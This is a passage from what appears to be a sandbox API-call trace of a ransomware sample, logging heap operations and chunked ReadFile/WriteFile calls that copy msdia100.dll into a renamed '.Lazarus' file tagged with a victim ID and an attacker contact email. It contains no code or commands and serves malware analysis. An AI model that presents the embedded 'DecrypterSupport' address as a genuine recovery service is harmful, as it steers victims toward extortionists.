[0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.582] AreFileApisANSI () returned 1 [0102.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6ebe0 [0102.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 63 [0102.582] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8127e00, ftCreationTime.dwHighDateTime=0x1cbd076, ftLastAccessTime.dwLowDateTime=0xcd0a4098, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0xd8127e00, ftLastWriteTime.dwHighDateTime=0x1cbd076, nFileSizeHigh=0x0, nFileSizeLow=0xf1b50)) returned 1 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0102.582] AreFileApisANSI () returned 1 [0102.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0102.582] GetLastError () returned 0x0 [0102.582] SetLastError (dwErrCode=0x0) [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de00 [0102.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x570e0 [0102.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0102.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0102.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0102.583] GetLastError () returned 0x0 [0102.583] SetLastError (dwErrCode=0x0) [0102.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0102.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a3b0 [0102.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0102.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0102.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0102.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0102.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.583] AreFileApisANSI () returned 1 [0102.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 125 [0102.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xfa) returned 0x30fc0 [0102.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x30fc0, cchWideChar=125 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 125 [0102.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.584] GetFileType (hFile=0x27c) returned 0x1 [0102.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0102.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0102.584] AreFileApisANSI () returned 1 [0102.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0102.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e2d8 [0102.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e2d8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 63 [0102.584] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.584] GetFileType (hFile=0x368) returned 0x1 [0102.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0102.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0102.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0102.585] GetLastError () returned 0x0 [0102.585] SetLastError (dwErrCode=0x0) [0102.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0102.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.585] GetLastError () returned 0x0 [0102.585] SetLastError (dwErrCode=0x0) [0102.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0102.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0102.585] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0102.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0102.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0102.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x996d8 [0102.587] GetLastError () returned 0x0 [0102.587] SetLastError (dwErrCode=0x0) [0102.587] GetLastError () returned 0x0 [0102.587] SetLastError (dwErrCode=0x0) [0102.588] GetLastError () returned 0x0 [0102.588] SetLastError (dwErrCode=0x0) [0102.588] GetLastError () returned 0x0 [0102.588] SetLastError (dwErrCode=0x0) [0102.588] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.589] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.590] GetLastError () returned 0x0 [0102.590] SetLastError (dwErrCode=0x0) [0102.590] GetLastError () returned 0x0 [0102.590] SetLastError (dwErrCode=0x0) [0102.590] GetLastError () returned 0x0 [0102.590] SetLastError (dwErrCode=0x0) [0102.590] GetLastError () returned 0x0 [0102.590] SetLastError (dwErrCode=0x0) [0102.590] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.590] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.590] GetLastError () returned 0x0 [0102.591] SetLastError (dwErrCode=0x0) [0102.591] GetLastError () returned 0x0 [0102.591] SetLastError (dwErrCode=0x0) [0102.591] GetLastError () returned 0x0 [0102.591] SetLastError (dwErrCode=0x0) [0102.591] GetLastError () returned 0x0 [0102.591] SetLastError (dwErrCode=0x0) [0102.591] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.591] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.591] GetLastError () returned 0x0 [0102.591] SetLastError (dwErrCode=0x0) [0102.592] GetLastError () returned 0x0 [0102.592] SetLastError (dwErrCode=0x0) [0102.592] GetLastError () returned 0x0 [0102.592] SetLastError (dwErrCode=0x0) [0102.592] GetLastError () returned 0x0 [0102.592] SetLastError (dwErrCode=0x0) [0102.592] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.592] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.592] GetLastError () returned 0x0 [0102.592] SetLastError (dwErrCode=0x0) [0102.592] GetLastError () returned 0x0 [0102.593] SetLastError (dwErrCode=0x0) [0102.593] GetLastError () returned 0x0 [0102.593] SetLastError (dwErrCode=0x0) [0102.593] GetLastError () returned 0x0 [0102.593] SetLastError (dwErrCode=0x0) [0102.593] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.593] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.593] GetLastError () returned 0x0 [0102.593] SetLastError (dwErrCode=0x0) [0102.593] GetLastError () returned 0x0 [0102.593] SetLastError (dwErrCode=0x0) [0102.594] GetLastError () returned 0x0 [0102.594] SetLastError (dwErrCode=0x0) [0102.594] GetLastError () returned 0x0 [0102.594] SetLastError (dwErrCode=0x0) [0102.594] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.594] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.594] GetLastError () returned 0x0 [0102.594] SetLastError (dwErrCode=0x0) [0102.594] GetLastError () returned 0x0 [0102.594] SetLastError (dwErrCode=0x0) [0102.594] GetLastError () returned 0x0 [0102.594] SetLastError (dwErrCode=0x0) [0102.595] GetLastError () returned 0x0 [0102.595] SetLastError (dwErrCode=0x0) [0102.595] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.595] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.595] GetLastError () returned 0x0 [0102.595] SetLastError (dwErrCode=0x0) [0102.595] GetLastError () returned 0x0 [0102.595] SetLastError (dwErrCode=0x0) [0102.595] GetLastError () returned 0x0 [0102.595] SetLastError (dwErrCode=0x0) [0102.595] GetLastError () returned 0x0 [0102.595] SetLastError (dwErrCode=0x0) [0102.596] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.648] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.649] GetLastError () returned 0x0 [0102.649] SetLastError (dwErrCode=0x0) [0102.753] GetLastError () returned 0x0 [0102.760] SetLastError (dwErrCode=0x0) [0102.760] GetLastError () returned 0x0 [0102.760] SetLastError (dwErrCode=0x0) [0102.760] GetLastError () returned 0x0 [0102.760] SetLastError (dwErrCode=0x0) [0102.761] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.761] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.761] GetLastError () returned 0x0 [0102.761] SetLastError (dwErrCode=0x0) [0102.761] GetLastError () returned 0x0 [0102.761] SetLastError (dwErrCode=0x0) [0102.761] GetLastError () returned 0x0 [0102.761] SetLastError (dwErrCode=0x0) [0102.761] GetLastError () returned 0x0 [0102.761] SetLastError (dwErrCode=0x0) [0102.762] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.762] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.762] GetLastError () returned 0x0 [0102.762] SetLastError (dwErrCode=0x0) [0102.762] GetLastError () returned 0x0 [0102.762] SetLastError (dwErrCode=0x0) [0102.762] GetLastError () returned 0x0 [0102.762] SetLastError (dwErrCode=0x0) [0102.762] GetLastError () returned 0x0 [0102.762] SetLastError (dwErrCode=0x0) [0102.762] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.763] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.763] GetLastError () returned 0x0 [0102.763] SetLastError (dwErrCode=0x0) [0102.763] GetLastError () returned 0x0 [0102.763] SetLastError (dwErrCode=0x0) [0102.763] GetLastError () returned 0x0 [0102.763] SetLastError (dwErrCode=0x0) [0102.763] GetLastError () returned 0x0 [0102.763] SetLastError (dwErrCode=0x0) [0102.763] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.763] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.764] GetLastError () returned 0x0 [0102.764] SetLastError (dwErrCode=0x0) [0102.764] GetLastError () returned 0x0 [0102.764] SetLastError (dwErrCode=0x0) [0102.764] GetLastError () returned 0x0 [0102.764] SetLastError (dwErrCode=0x0) [0102.764] GetLastError () returned 0x0 [0102.764] SetLastError (dwErrCode=0x0) [0102.764] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.764] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.765] GetLastError () returned 0x0 [0102.765] SetLastError (dwErrCode=0x0) [0102.765] GetLastError () returned 0x0 [0102.765] SetLastError (dwErrCode=0x0) [0102.765] GetLastError () returned 0x0 [0102.765] SetLastError (dwErrCode=0x0) [0102.765] GetLastError () returned 0x0 [0102.765] SetLastError (dwErrCode=0x0) [0102.765] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.767] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.767] GetLastError () returned 0x0 [0102.767] SetLastError (dwErrCode=0x0) [0102.767] GetLastError () returned 0x0 [0102.767] SetLastError (dwErrCode=0x0) [0102.767] GetLastError () returned 0x0 [0102.767] SetLastError (dwErrCode=0x0) [0102.767] GetLastError () returned 0x0 [0102.768] SetLastError (dwErrCode=0x0) [0102.768] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.768] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.768] GetLastError () returned 0x0 [0102.768] SetLastError (dwErrCode=0x0) [0102.768] GetLastError () returned 0x0 [0102.768] SetLastError (dwErrCode=0x0) [0102.768] GetLastError () returned 0x0 [0102.768] SetLastError (dwErrCode=0x0) [0102.768] GetLastError () returned 0x0 [0102.768] SetLastError (dwErrCode=0x0) [0102.769] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.769] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.769] GetLastError () returned 0x0 [0102.769] SetLastError (dwErrCode=0x0) [0102.769] GetLastError () returned 0x0 [0102.769] SetLastError (dwErrCode=0x0) [0102.769] GetLastError () returned 0x0 [0102.769] SetLastError (dwErrCode=0x0) [0102.769] GetLastError () returned 0x0 [0102.769] SetLastError (dwErrCode=0x0) [0102.769] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.770] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.770] GetLastError () returned 0x0 [0102.770] SetLastError (dwErrCode=0x0) [0102.770] GetLastError () returned 0x0 [0102.770] SetLastError (dwErrCode=0x0) [0102.770] GetLastError () returned 0x0 [0102.770] SetLastError (dwErrCode=0x0) [0102.770] GetLastError () returned 0x0 [0102.770] SetLastError (dwErrCode=0x0) [0102.771] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.771] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.771] GetLastError () returned 0x0 [0102.771] SetLastError (dwErrCode=0x0) [0102.771] GetLastError () returned 0x0 [0102.771] SetLastError (dwErrCode=0x0) [0102.771] GetLastError () returned 0x0 [0102.771] SetLastError (dwErrCode=0x0) [0102.771] GetLastError () returned 0x0 [0102.771] SetLastError (dwErrCode=0x0) [0102.771] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.772] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.772] GetLastError () returned 0x0 [0102.772] SetLastError (dwErrCode=0x0) [0102.772] GetLastError () returned 0x0 [0102.772] SetLastError (dwErrCode=0x0) [0102.772] GetLastError () returned 0x0 [0102.772] SetLastError (dwErrCode=0x0) [0102.772] GetLastError () returned 0x0 [0102.772] SetLastError (dwErrCode=0x0) [0102.772] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.773] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.773] GetLastError () returned 0x0 [0102.773] SetLastError (dwErrCode=0x0) [0102.773] GetLastError () returned 0x0 [0102.773] SetLastError (dwErrCode=0x0) [0102.773] GetLastError () returned 0x0 [0102.774] SetLastError (dwErrCode=0x0) [0102.774] GetLastError () returned 0x0 [0102.774] SetLastError (dwErrCode=0x0) [0102.774] ReadFile (in: 